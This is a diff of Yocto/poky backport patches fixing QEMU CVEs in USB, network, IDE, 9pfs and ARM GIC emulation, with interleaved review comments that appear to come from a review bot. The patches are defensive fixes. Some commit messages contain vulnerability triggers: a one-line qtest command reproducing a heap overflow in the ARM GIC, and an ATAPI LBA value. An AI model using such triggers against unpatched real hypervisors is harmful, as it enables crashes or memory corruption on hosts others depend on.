<kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2020-25624 patch #2 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/usb/hcd-ohci.c | 24 ++++++++++++++++++++++-- + 1 file changed, 22 insertions(+), 2 deletions(-) + +diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c +index 1e6e85e86a..9dc59101f9 100644 +--- a/hw/usb/hcd-ohci.c ++++ b/hw/usb/hcd-ohci.c +@@ -731,7 +731,11 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed, + } + + start_offset = iso_td.offset[relative_frame_number]; +- next_offset = 
iso_td.offset[relative_frame_number + 1]; ++ if (relative_frame_number < frame_count) { ++ next_offset = iso_td.offset[relative_frame_number + 1]; ++ } else { ++ next_offset = iso_td.be; ++ } + + if (!(OHCI_BM(start_offset, TD_PSW_CC) & 0xe) || + ((relative_frame_number < frame_count) && +@@ -764,7 +768,12 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed, + } + } else { + /* Last packet in the ISO TD */ +- end_addr = iso_td.be; ++ end_addr = next_offset; ++ } ++ ++ if (start_addr > end_addr) { ++ trace_usb_ohci_iso_td_bad_cc_overrun(start_addr, end_addr); ++ return 1; + } + + if ((start_addr & OHCI_PAGE_MASK) != (end_addr & OHCI_PAGE_MASK)) { +@@ -773,6 +782,9 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed, + } else { + len = end_addr - start_addr + 1; + } ++ if (len > sizeof(ohci->usb_buf)) { ++ len = sizeof(ohci->usb_buf); ++ } + + if (len && dir != OHCI_TD_DIR_IN) { + if (ohci_copy_iso_td(ohci, start_addr, end_addr, ohci->usb_buf, len, +@@ -975,8 +987,16 @@ static int ohci_service_td(OHCIState *ohci, struct ohci_ed *ed) + if ((td.cbp & 0xfffff000) != (td.be & 0xfffff000)) { + len = (td.be & 0xfff) + 0x1001 - (td.cbp & 0xfff); + } else { ++ if (td.cbp > td.be) { ++ trace_usb_ohci_iso_td_bad_cc_overrun(td.cbp, td.be); ++ ohci_die(ohci); ++ return 1; ++ } + len = (td.be - td.cbp) + 1; + } ++ if (len > sizeof(ohci->usb_buf)) { ++ len = sizeof(ohci->usb_buf); ++ } + + pktlen = len; + if (len && dir != OHCI_TD_DIR_IN) { +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch new file mode 100644 index 0000000000..374d7c4562 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch 
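Review bot: In `ohci_service_td` the new `td.cbp > td.be` branch logs through `trace_usb_ohci_iso_td_bad_cc_overrun()`, an event named for isochronous TDs, so a general TD failure will be attributed to the iso path in traces; a dedicated trace event for this path would avoid that. The two new range checks also react differently: `ohci_service_iso_td` only returns 1 on `start_addr > end_addr`, while `ohci_service_td` also calls `ohci_die(ohci)`. If that difference is intended, it deserves a one-line comment at each site. The `len > sizeof(ohci->usb_buf)` clamps truncate silently; a `qemu_log_mask(LOG_GUEST_ERROR, ...)` there would make the malformed descriptor visible to whoever is debugging the guest. Both functions extend beyond the hunks shown.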
@@ -0,0 +1,42 @@ +From 1be90ebecc95b09a2ee5af3f60c412b45a766c4f Mon Sep 17 00:00:00 2001 +From: Prasad J Pandit <pjp@fedoraproject.org> +Date: Tue, 15 Sep 2020 23:52:59 +0530 +Subject: [PATCH] hw: usb: hcd-ohci: check for processed TD before retire + +While servicing OHCI transfer descriptors(TD), ohci_service_iso_td +retires a TD if it has passed its time frame. It does not check if +the TD was already processed once and holds an error code in TD_CC. +It may happen if the TD list has a loop. Add check to avoid an +infinite loop condition. + +Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org> +Reviewed-by: Li Qiang <liq3ea@gmail.com> +Message-id: 20200915182259.68522-3-ppandit@redhat.com +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2020-25625 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/usb/hcd-ohci.c | 4 ++++ + 1 file changed, 4 insertions(+) + +diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c +index 9dc59101f9..8b912e95d3 100644 +--- a/hw/usb/hcd-ohci.c ++++ b/hw/usb/hcd-ohci.c +@@ -691,6 +691,10 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed, + the next ISO TD of the same ED */ + trace_usb_ohci_iso_td_relative_frame_number_big(relative_frame_number, + frame_count); ++ if (OHCI_CC_DATAOVERRUN == OHCI_BM(iso_td.flags, TD_CC)) { ++ /* avoid infinite loop */ ++ return 1; ++ } + OHCI_SET_BM(iso_td.flags, TD_CC, OHCI_CC_DATAOVERRUN); + ed->head &= ~OHCI_DPTR_MASK; + ed->head |= (iso_td.next & OHCI_DPTR_MASK); +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch new file mode 100644 index 0000000000..7bfc2beecb --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch 
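Review bot: The comment `/* avoid infinite loop */` on the new early return in `ohci_service_iso_td` does not say which loop is meant or why this condition detects it. Something like `/* TD already retired with DATAOVERRUN: the TD list loops back, stop here */` would carry the reasoning from the patch description into the code. The function starts and ends outside the hunk.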
@@ -0,0 +1,49 @@ +From 7564bf7701f00214cdc8a678a9f7df765244def1 Mon Sep 17 00:00:00 2001 +From: Prasad J Pandit <pjp@fedoraproject.org> +Date: Wed, 21 Oct 2020 11:35:50 +0530 +Subject: [PATCH] net: remove an assert call in eth_get_gso_type + +eth_get_gso_type() routine returns segmentation offload type based on +L3 protocol type. It calls g_assert_not_reached if L3 protocol is +unknown, making the following return statement unreachable. Remove the +g_assert call, it maybe triggered by a guest user. + +Reported-by: Gaoning Pan <pgn@zju.edu.cn> +Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org> +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upsteram-Status: Backport +CVE: CVE-2020-27617 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + net/eth.c | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/net/eth.c b/net/eth.c +index 0c1d413ee2..1e0821c5f8 100644 +--- a/net/eth.c ++++ b/net/eth.c +@@ -16,6 +16,7 @@ + */ + + #include "qemu/osdep.h" ++#include "qemu/log.h" + #include "net/eth.h" + #include "net/checksum.h" + #include "net/tap.h" +@@ -71,9 +72,8 @@ eth_get_gso_type(uint16_t l3_proto, uint8_t *l3_hdr, uint8_t l4proto) + return VIRTIO_NET_HDR_GSO_TCPV6 | ecn_state; + } + } +- +- /* Unsupported offload */ +- g_assert_not_reached(); ++ qemu_log_mask(LOG_UNIMP, "%s: probably not GSO frame, " ++ "unknown L3 protocol: 0x%04"PRIx16"\n", __func__, l3_proto); + + return VIRTIO_NET_HDR_GSO_NONE | ecn_state; + } +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch new file mode 100644 index 0000000000..756b1c1495 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch 
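Review bot: The patch header tag is misspelled as `Upsteram-Status: Backport`, whereas the other patches in this series use `Upstream-Status:`. Tooling that looks for that tag will presumably treat this patch as carrying no upstream status. The line should read `Upstream-Status: Backport`.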
@@ -0,0 +1,48 @@ +From c2cb511634012344e3d0fe49a037a33b12d8a98a Mon Sep 17 00:00:00 2001 +From: Prasad J Pandit <pjp@fedoraproject.org> +Date: Wed, 11 Nov 2020 18:36:36 +0530 +Subject: [PATCH] hw/net/e1000e: advance desc_offset in case of null descriptor + +While receiving packets via e1000e_write_packet_to_guest() routine, +'desc_offset' is advanced only when RX descriptor is processed. And +RX descriptor is not processed if it has NULL buffer address. +This may lead to an infinite loop condition. Increament 'desc_offset' +to process next descriptor in the ring to avoid infinite loop. + +Reported-by: Cheol-woo Myung <330cjfdn@gmail.com> +Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org> +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2020-28916 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/net/e1000e_core.c | 8 ++++---- + 1 file changed, 4 insertions(+), 4 deletions(-) + +diff --git a/hw/net/e1000e_core.c b/hw/net/e1000e_core.c +index d8b9e4b2f4..095c01ebc6 100644 +--- a/hw/net/e1000e_core.c ++++ b/hw/net/e1000e_core.c +@@ -1596,13 +1596,13 @@ e1000e_write_packet_to_guest(E1000ECore *core, struct NetRxPkt *pkt, + (const char *) &fcs_pad, e1000x_fcs_len(core->mac)); + } + } +- desc_offset += desc_size; +- if (desc_offset >= total_size) { +- is_last = true; +- } + } else { /* as per intel docs; skip descriptors with null buf addr */ + trace_e1000e_rx_null_descriptor(); + } ++ desc_offset += desc_size; ++ if (desc_offset >= total_size) { ++ is_last = true; ++ } + + e1000e_write_rx_descr(core, desc, is_last ? core->rx_pkt : NULL, + rss_info, do_ps ? ps_hdr_len : 0, &bastate.written); +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch new file mode 100644 index 0000000000..1528d5c2fd --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch 
@@ -0,0 +1,45 @@ +From 813212288970c39b1800f63e83ac6e96588095c6 Mon Sep 17 00:00:00 2001 +From: Paolo Bonzini <pbonzini@redhat.com> +Date: Tue, 1 Dec 2020 13:09:26 +0100 +Subject: [PATCH] ide: atapi: assert that the buffer pointer is in range + +A case was reported where s->io_buffer_index can be out of range. +The report skimped on the details but it seems to be triggered +by s->lba == -1 on the READ/READ CD paths (e.g. by sending an +ATAPI command with LBA = 0xFFFFFFFF). For now paper over it +with assertions. The first one ensures that there is no overflow +when incrementing s->io_buffer_index, the second checks for the +buffer overrun. + +Note that the buffer overrun is only a read, so I am not sure +if the assertion failure is actually less harmful than the overrun. + +Signed-off-by: Paolo Bonzini <pbonzini@redhat.com> +Message-id: 20201201120926.56559-1-pbonzini@redhat.com +Reviewed-by: Kevin Wolf <kwolf@redhat.com> +Signed-off-by: Peter Maydell <peter.maydell@linaro.org> + +Upstream-Status: Backport +CVE: CVE-2020-29443 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/ide/atapi.c | 2 ++ + 1 file changed, 2 insertions(+) + +diff --git a/hw/ide/atapi.c b/hw/ide/atapi.c +index 14a2b0bb2f..e79157863f 100644 +--- a/hw/ide/atapi.c ++++ b/hw/ide/atapi.c +@@ -276,6 +276,8 @@ void ide_atapi_cmd_reply_end(IDEState *s) + s->packet_transfer_size -= size; + s->elementary_transfer_size -= size; + s->io_buffer_index += size; ++ assert(size <= s->io_buffer_total_len); ++ assert(s->io_buffer_index <= s->io_buffer_total_len); + + /* Some adapters process PIO data right away. In that case, we need + * to avoid mutual recursion between ide_transfer_start +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch new file mode 100644 index 0000000000..1b8c77f838 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch 
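Review bot: The two added `assert()` calls in `ide_atapi_cmd_reply_end` turn an out-of-range `io_buffer_index`, which the description says an ATAPI command from the guest can trigger, into an abort of the whole QEMU process. The description itself calls this papering over, and the CVE-2020-27617 patch in this same series removes an assertion because a guest could trigger it. Logging with `qemu_log_mask(LOG_GUEST_ERROR, ...)` and ending the command with an error would contain the condition to the guest, though the error path that would need is outside this hunk. The first assert is also described as guarding the increment, yet it runs after `s->io_buffer_index += size;`, so moving `assert(size <= s->io_buffer_total_len);` above that line would match its stated purpose.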
@@ -0,0 +1,81 @@ +From c2d2d14e8deece958bbc4fc649d22c3564bc4e7e Mon Sep 17 00:00:00 2001 +From: Greg Kurz <groug@kaod.org> +Date: Thu, 14 Jan 2021 17:04:12 +0100 +Subject: [PATCH] 9pfs: Fully restart unreclaim loop (CVE-2021-20181) + +Depending on the client activity, the server can be asked to open a huge +number of file descriptors and eventually hit RLIMIT_NOFILE. This is +currently mitigated using a reclaim logic : the server closes the file +descriptors of idle fids, based on the assumption that it will be able +to re-open them later. This assumption doesn't hold of course if the +client requests the file to be unlinked. In this case, we loop on the +entire fid list and mark all related fids as unreclaimable (the reclaim +logic will just ignore them) and, of course, we open or re-open their +file descriptors if needed since we're about to unlink the file. + +This is the purpose of v9fs_mark_fids_unreclaim(). Since the actual +opening of a file can cause the coroutine to yield, another client +request could possibly add a new fid that we may want to mark as +non-reclaimable as well. The loop is thus restarted if the re-open +request was actually transmitted to the backend. This is achieved +by keeping a reference on the first fid (head) before traversing +the list. + +This is wrong in several ways: +- a potential clunk request from the client could tear the first + fid down and cause the reference to be stale. This leads to a + use-after-free error that can be detected with ASAN, using a + custom 9p client +- fids are added at the head of the list : restarting from the + previous head will always miss fids added by a some other + potential request + +All these problems could be avoided if fids were being added at the +end of the list. This can be achieved with a QSIMPLEQ, but this is +probably too much change for a bug fix. For now let's keep it +simple and just restart the loop from the current head. 
+ +Fixes: CVE-2021-20181 +Buglink: https://bugs.launchpad.net/qemu/+bug/1911666 +Reported-by: Zero Day Initiative <zdi-disclosures@trendmicro.com> +Reviewed-by: Christian Schoenebeck <qemu_oss@crudebyte.com> +Reviewed-by: Stefano Stabellini <sstabellini@kernel.org> +Message-Id: <161064025265.1838153.15185571283519390907.stgit@bahia.lan> +Signed-off-by: Greg Kurz <groug@kaod.org> + +Upstream-Status: Backport [89fbea8737e8f7b954745a1ffc4238d377055305] +CVE: CVE-2021-20181 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/9pfs/9p.c | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c +index 94df440fc..6026b51a1 100644 +--- a/hw/9pfs/9p.c ++++ b/hw/9pfs/9p.c +@@ -502,9 +502,9 @@ static int coroutine_fn v9fs_mark_fids_unreclaim(V9fsPDU *pdu, V9fsPath *path) + { + int err; + V9fsState *s = pdu->s; +- V9fsFidState *fidp, head_fid; ++ V9fsFidState *fidp; + +- head_fid.next = s->fid_list; ++again: + for (fidp = s->fid_list; fidp; fidp = fidp->next) { + if (fidp->path.size != path->size) { + continue; +@@ -524,7 +524,7 @@ static int coroutine_fn v9fs_mark_fids_unreclaim(V9fsPDU *pdu, V9fsPath *path) + * switched to the worker thread + */ + if (err == 0) { +- fidp = &head_fid; ++ goto again; + } + } + } +-- +2.29.2 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch new file mode 100644 index 0000000000..46c9ab4184 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch 
@@ -0,0 +1,67 @@ +From edfe2eb4360cde4ed5d95bda7777edcb3510f76a Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org> +Date: Sun, 31 Jan 2021 11:34:01 +0100 +Subject: [PATCH] hw/intc/arm_gic: Fix interrupt ID in GICD_SGIR register +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Per the ARM Generic Interrupt Controller Architecture specification +(document "ARM IHI 0048B.b (ID072613)"), the SGIINTID field is 4 bit, +not 10: + + - 4.3 Distributor register descriptions + - 4.3.15 Software Generated Interrupt Register, GICD_SG + + - Table 4-21 GICD_SGIR bit assignments + + The Interrupt ID of the SGI to forward to the specified CPU + interfaces. The value of this field is the Interrupt ID, in + the range 0-15, for example a value of 0b0011 specifies + Interrupt ID 3. + +Correct the irq mask to fix an undefined behavior (which eventually +lead to a heap-buffer-overflow, see [Buglink]): + + $ echo 'writel 0x8000f00 0xff4affb0' | qemu-system-aarch64 -M virt,accel=qtest -qtest stdio + [I 1612088147.116987] OPENED + [R +0.278293] writel 0x8000f00 0xff4affb0 + ../hw/intc/arm_gic.c:1498:13: runtime error: index 944 out of bounds for type 'uint8_t [16][8]' + SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior ../hw/intc/arm_gic.c:1498:13 + +This fixes a security issue when running with KVM on Arm with +kernel-irqchip=off. (The default is kernel-irqchip=on, which is +unaffected, and which is also the correct choice for performance.) 
+ +Cc: qemu-stable@nongnu.org +Fixes: CVE-2021-20221 +Fixes: 9ee6e8bb853 ("ARMv7 support.") +Buglink: https://bugs.launchpad.net/qemu/+bug/1913916 +Buglink: https://bugs.launchpad.net/qemu/+bug/1913917 +Reported-by: Alexander Bulekov <alxndr@bu.edu> +Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org> +Message-id: 20210131103401.217160-1-f4bug@amsat.org +Reviewed-by: Peter Maydell <peter.maydell@linaro.org> +Signed-off-by: Peter Maydell <peter.maydell@linaro.org> + +Upstream-Status: Backport +CVE: CVE-2021-20221 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/intc/arm_gic.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/intc/arm_gic.c +=================================================================== +--- qemu-4.2.0.orig/hw/intc/arm_gic.c ++++ qemu-4.2.0/hw/intc/arm_gic.c +@@ -1455,7 +1455,7 @@ static void gic_dist_writel(void *opaque + int target_cpu; + + cpu = gic_get_current_cpu(s); +- irq = value & 0x3ff; ++ irq = value & 0xf; + switch ((value >> 24) & 3) { + case 0: + mask = (value >> 16) & ALL_CPU_MASK; diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch new file mode 100644 index 0000000000..7175b24e99 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch 
@@ -0,0 +1,55 @@ +From affdf476543405045c281a7c67d1eaedbcea8135 Mon Sep 17 00:00:00 2001 +From: Jason Wang <jasowang@redhat.com> +Date: Wed, 24 Feb 2021 13:45:28 +0800 +Subject: [PATCH] e1000: fail early for evil descriptor + +During procss_tx_desc(), driver can try to chain data descriptor with +legacy descriptor, when will lead underflow for the following +calculation in process_tx_desc() for bytes: + + if (tp->size + bytes > msh) + bytes = msh - tp->size; + +This will lead a infinite loop. So check and fail early if tp->size if +greater or equal to msh. + +Reported-by: Alexander Bulekov <alxndr@bu.edu> +Reported-by: Cheolwoo Myung <cwmyung@snu.ac.kr> +Reported-by: Ruhr-University Bochum <bugs-syssec@rub.de> +Cc: Prasad J Pandit <ppandit@redhat.com> +Cc: qemu-stable@nongnu.org +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport [3de46e6fc489c52c9431a8a832ad8170a7569bd8] +CVE: CVE-2021-20257 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/net/e1000.c | 4 ++++ + 1 file changed, 4 insertions(+) + +diff --git a/hw/net/e1000.c b/hw/net/e1000.c +index cf22c4f07..c3564c7ce 100644 +--- a/hw/net/e1000.c ++++ b/hw/net/e1000.c +@@ -670,6 +670,9 @@ process_tx_desc(E1000State *s, struct e1000_tx_desc *dp) + msh = tp->tso_props.hdr_len + tp->tso_props.mss; + do { + bytes = split_size; ++ if (tp->size >= msh) { ++ goto eop; ++ } + if (tp->size + bytes > msh) + bytes = msh - tp->size; + +@@ -695,6 +698,7 @@ process_tx_desc(E1000State *s, struct e1000_tx_desc *dp) + tp->size += split_size; + } + ++eop: + if (!(txd_lower & E1000_TXD_CMD_EOP)) + return; + if (!(tp->cptse && tp->size < tp->tso_props.hdr_len)) { +-- +2.29.2 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch new file mode 100644 index 0000000000..5bacd67481 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch 
@@ -0,0 +1,177 @@ +From 4b1988a29d67277d6c8ce1df52975f5616592913 Mon Sep 17 00:00:00 2001 +From: Jason Wang <jasowang@redhat.com> +Date: Wed, 24 Feb 2021 11:44:36 +0800 +Subject: [PATCH 01/10] net: introduce qemu_receive_packet() +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Some NIC supports loopback mode and this is done by calling +nc->info->receive() directly which in fact suppresses the effort of +reentrancy check that is done in qemu_net_queue_send(). + +Unfortunately we can't use qemu_net_queue_send() here since for +loopback there's no sender as peer, so this patch introduce a +qemu_receive_packet() which is used for implementing loopback mode +for a NIC with this check. + +NIC that supports loopback mode will be converted to this helper. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit <ppandit@redhat.com> +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Cc: qemu-stable@nongnu.org +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport [705df5466c98f3efdd2b68d3b31dad86858acad7] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + include/net/net.h | 5 +++++ + include/net/queue.h | 8 ++++++++ + net/net.c | 38 +++++++++++++++++++++++++++++++------- + net/queue.c | 22 ++++++++++++++++++++++ + 4 files changed, 66 insertions(+), 7 deletions(-) + +diff --git a/include/net/net.h b/include/net/net.h +index 778fc787c..03f058ecb 100644 +--- a/include/net/net.h ++++ b/include/net/net.h +@@ -143,12 +143,17 @@ void *qemu_get_nic_opaque(NetClientState *nc); + void qemu_del_net_client(NetClientState *nc); + typedef void (*qemu_nic_foreach)(NICState *nic, void *opaque); + void qemu_foreach_nic(qemu_nic_foreach func, void *opaque); ++int qemu_can_receive_packet(NetClientState *nc); + int qemu_can_send_packet(NetClientState *nc); + ssize_t qemu_sendv_packet(NetClientState *nc, const struct iovec *iov, + int iovcnt); + ssize_t 
qemu_sendv_packet_async(NetClientState *nc, const struct iovec *iov, + int iovcnt, NetPacketSent *sent_cb); + ssize_t qemu_send_packet(NetClientState *nc, const uint8_t *buf, int size); ++ssize_t qemu_receive_packet(NetClientState *nc, const uint8_t *buf, int size); ++ssize_t qemu_receive_packet_iov(NetClientState *nc, ++ const struct iovec *iov, ++ int iovcnt); + ssize_t qemu_send_packet_raw(NetClientState *nc, const uint8_t *buf, int size); + ssize_t qemu_send_packet_async(NetClientState *nc, const uint8_t *buf, + int size, NetPacketSent *sent_cb); +diff --git a/include/net/queue.h b/include/net/queue.h +index c0269bb1d..9f2f289d7 100644 +--- a/include/net/queue.h ++++ b/include/net/queue.h +@@ -55,6 +55,14 @@ void qemu_net_queue_append_iov(NetQueue *queue, + + void qemu_del_net_queue(NetQueue *queue); + ++ssize_t qemu_net_queue_receive(NetQueue *queue, ++ const uint8_t *data, ++ size_t size); ++ ++ssize_t qemu_net_queue_receive_iov(NetQueue *queue, ++ const struct iovec *iov, ++ int iovcnt); ++ + ssize_t qemu_net_queue_send(NetQueue *queue, + NetClientState *sender, + unsigned flags, +diff --git a/net/net.c b/net/net.c +index 6a2c3d956..5e15e5d27 100644 +--- a/net/net.c ++++ b/net/net.c +@@ -528,6 +528,17 @@ int qemu_set_vnet_be(NetClientState *nc, bool is_be) + #endif + } + ++int qemu_can_receive_packet(NetClientState *nc) ++{ ++ if (nc->receive_disabled) { ++ return 0; ++ } else if (nc->info->can_receive && ++ !nc->info->can_receive(nc)) { ++ return 0; ++ } ++ return 1; ++} ++ + int qemu_can_send_packet(NetClientState *sender) + { + int vm_running = runstate_is_running(); +@@ -540,13 +551,7 @@ int qemu_can_send_packet(NetClientState *sender) + return 1; + } + +- if (sender->peer->receive_disabled) { +- return 0; +- } else if (sender->peer->info->can_receive && +- !sender->peer->info->can_receive(sender->peer)) { +- return 0; +- } +- return 1; ++ return qemu_can_receive_packet(sender->peer); + } + + static ssize_t filter_receive_iov(NetClientState *nc, +@@ 
-679,6 +684,25 @@ ssize_t qemu_send_packet(NetClientState *nc, const uint8_t *buf, int size) + return qemu_send_packet_async(nc, buf, size, NULL); + } + ++ssize_t qemu_receive_packet(NetClientState *nc, const uint8_t *buf, int size) ++{ ++ if (!qemu_can_receive_packet(nc)) { ++ return 0; ++ } ++ ++ return qemu_net_queue_receive(nc->incoming_queue, buf, size); ++} ++ ++ssize_t qemu_receive_packet_iov(NetClientState *nc, const struct iovec *iov, ++ int iovcnt) ++{ ++ if (!qemu_can_receive_packet(nc)) { ++ return 0; ++ } ++ ++ return qemu_net_queue_receive_iov(nc->incoming_queue, iov, iovcnt); ++} ++ + ssize_t qemu_send_packet_raw(NetClientState *nc, const uint8_t *buf, int size) + { + return qemu_send_packet_async_with_flags(nc, QEMU_NET_PACKET_FLAG_RAW, +diff --git a/net/queue.c b/net/queue.c +index 19e32c80f..c872d51df 100644 +--- a/net/queue.c ++++ b/net/queue.c +@@ -182,6 +182,28 @@ static ssize_t qemu_net_queue_deliver_iov(NetQueue *queue, + return ret; + } + ++ssize_t qemu_net_queue_receive(NetQueue *queue, ++ const uint8_t *data, ++ size_t size) ++{ ++ if (queue->delivering) { ++ return 0; ++ } ++ ++ return qemu_net_queue_deliver(queue, NULL, 0, data, size); ++} ++ ++ssize_t qemu_net_queue_receive_iov(NetQueue *queue, ++ const struct iovec *iov, ++ int iovcnt) ++{ ++ if (queue->delivering) { ++ return 0; ++ } ++ ++ return qemu_net_queue_deliver_iov(queue, NULL, 0, iov, iovcnt); ++} ++ + ssize_t qemu_net_queue_send(NetQueue *queue, + NetClientState *sender, + unsigned flags, +-- +2.29.2 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch new file mode 100644 index 0000000000..fdb4894e44 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch 
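Review bot: qemu_receive_packet() and qemu_receive_packet_iov() are declared in include/net/net.h without any comment on their return value, and 0 has two different meanings: qemu_can_receive_packet() refused the packet, or qemu_net_queue_receive() found `queue->delivering` set. In both cases the packet is dropped rather than queued, and the converted device models later in this series ignore the result. A header comment would make that contract explicit, e.g. `/* Loopback delivery to nc itself; returns 0 and drops the packet if nc cannot receive or its queue is already delivering (re-entrant call). */`.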
@@ -0,0 +1,41 @@ +From 65b851efd3d0280425c202f4e5880c48f8334dae Mon Sep 17 00:00:00 2001 +From: Alexander Bulekov <alxndr@bu.edu> +Date: Mon, 1 Mar 2021 14:35:30 -0500 +Subject: [PATCH 10/10] lan9118: switch to use qemu_receive_packet() for + loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit <ppandit@redhat.com> +Cc: qemu-stable@nongnu.org +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com +Signed-off-by: Alexander Bulekov <alxndr@bu.edu> +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport [37cee01784ff0df13e5209517e1b3594a5e792d1] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/net/lan9118.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/net/lan9118.c +=================================================================== +--- qemu-4.2.0.orig/hw/net/lan9118.c ++++ qemu-4.2.0/hw/net/lan9118.c +@@ -667,7 +667,7 @@ static void do_tx_packet(lan9118_state * + /* FIXME: Honor TX disable, and allow queueing of packets. */ + if (s->phy_control & 0x4000) { + /* This assumes the receive routine doesn't touch the VLANClient. */ +- lan9118_receive(qemu_get_queue(s->nic), s->txp->data, s->txp->len); ++ qemu_receive_packet(qemu_get_queue(s->nic), s->txp->data, s->txp->len); + } else { + qemu_send_packet(qemu_get_queue(s->nic), s->txp->data, s->txp->len); + } diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch new file mode 100644 index 0000000000..5e53e20bac --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch 
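Review bot: The context comment directly above the changed call in do_tx_packet(), `/* This assumes the receive routine doesn't touch the VLANClient. */`, was written for the direct lan9118_receive() call and is left unchanged. After this change the loopback frame goes through qemu_receive_packet(), which per patch 01/10 returns 0 without delivering when the queue is already delivering. I would replace the comment with `/* Loop back through qemu_receive_packet() so a re-entrant transmit is dropped instead of recursing. */`. The return value is ignored here and in the e1000, sungem, net_tx_pkt, pcnet and cadence_gem conversions, so a dropped loopback frame is silent; that looks intended but is worth stating once.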
